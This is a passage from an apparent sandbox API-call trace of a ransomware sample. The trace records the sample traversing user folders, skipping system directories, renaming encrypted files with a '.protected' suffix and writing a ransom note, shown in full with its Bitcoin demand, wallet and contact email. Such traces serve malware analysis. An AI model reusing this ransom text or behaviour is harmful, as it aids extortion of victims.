(in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.807] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.808] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.808] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.808] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) 
returned 1 [0089.808] CloseHandle (hObject=0xd4) returned 1 [0089.809] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif.protected") returned 72 [0089.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_2up2jf.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_2up2jf.gif.protected")) returned 1 [0089.811] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="Windows") returned -1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="Program Files") returned -1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="Program Files (x86)") returned -1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="$Recycle.bin") returned 1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="System Volume Information") returned -1 [0089.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia") returned 60 [0089.811] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0089.811] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0089.811] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*") returned 62 [0089.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.811] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0089.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.811] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.811] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\.") returned 62 [0089.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.811] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.812] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\..") returned 63 [0089.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.812] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="Windows") returned -1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files") returned -1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files (x86)") returned -1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="$Recycle.bin") returned 1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="System Volume Information") returned -1 [0089.812] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player") returned 73 [0089.812] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0089.812] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0089.812] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned 75 [0089.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.812] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\.") returned 75 [0089.813] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.813] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.813] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.813] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.813] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.813] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.813] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\..") returned 
76 [0089.813] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.813] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.813] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="Windows") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="Program Files") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="Program Files (x86)") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="$Recycle.bin") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="System Volume Information") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned 88 [0089.813] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0089.813] lstrcmpW (lpString1="#SharedObjects", lpString2="..") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned 90 [0089.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.814] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.814] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.814] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.814] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.814] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.814] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.") returned 90 [0089.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.814] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.815] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.815] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.815] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.815] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.815] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.815] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\..") returned 91 [0089.815] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.815] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.815] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="Windows") returned -1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="Program Files") returned -1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="Program Files (x86)") returned -1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="$Recycle.bin") returned 1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="System Volume Information") returned -1 [0089.815] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned 97 [0089.815] lstrcmpW (lpString1="P7Y3F7QB", lpString2=".") returned 1 [0089.815] lstrcmpW (lpString1="P7Y3F7QB", lpString2="..") returned 1 [0089.816] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*") returned 99 [0089.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.816] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\.") returned 99 [0089.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.816] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.817] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.817] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.817] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.817] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.817] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.817] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\..") returned 100 [0089.817] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.817] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | 
out: lpFindFileData=0x295e560) returned 0 [0089.817] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.817] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\RESTORE_FILES.txt") returned 115 [0089.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\p7y3f7qb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.818] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.818] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.819] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.819] WriteFile (in: hFile=0x150, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.819] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.819] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.819] CloseHandle (hObject=0x150) returned 1 [0089.819] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.819] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.819] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\RESTORE_FILES.txt") returned 106 [0089.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.820] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.820] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.821] lstrlenA (lpString="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") returned 684 [0089.821] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.821] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.821] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.821] CloseHandle (hObject=0x14c) returned 1 [0089.822] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="Windows") returned -1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="Program Files") returned -1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="Program Files (x86)") returned -1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="$Recycle.bin") returned 1 [0089.822] lstrcmpiW (lpString1="macromedia.com", lpString2="System Volume Information") returned -1 [0089.822] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned 88 [0089.822] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0089.822] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0089.822] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned 90 [0089.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.823] lstrcmpiW (lpString1=".", lpString2="Program 
Files") returned -1 [0089.823] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.823] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.823] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\.") returned 90 [0089.823] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.823] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.823] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.823] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.823] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.823] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\..") returned 91 [0089.823] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.823] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="Windows") returned -1 [0089.823] lstrcmpiW (lpString1="support", lpString2="Program Files") returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="Program Files (x86)") returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="$Recycle.bin") returned 1 [0089.823] lstrcmpiW (lpString1="support", lpString2="System Volume Information") returned -1 [0089.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned 96 [0089.823] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0089.823] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0089.824] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned 98 [0089.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.824] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.824] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.824] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.824] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.824] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.824] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\.") returned 98 [0089.824] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.824] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.824] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.824] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.824] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.825] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.825] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.825] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\..") returned 99 [0089.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.825] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="Windows") returned -1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="Program Files") returned -1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="Program Files (x86)") returned -1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="$Recycle.bin") returned 1 [0089.825] lstrcmpiW (lpString1="flashplayer", lpString2="System Volume Information") returned -1 [0089.825] wnsprintfW (in: 